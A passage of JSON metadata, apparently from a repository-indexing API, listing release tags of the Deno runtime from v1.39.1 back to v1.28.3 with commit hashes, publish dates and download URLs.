d/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/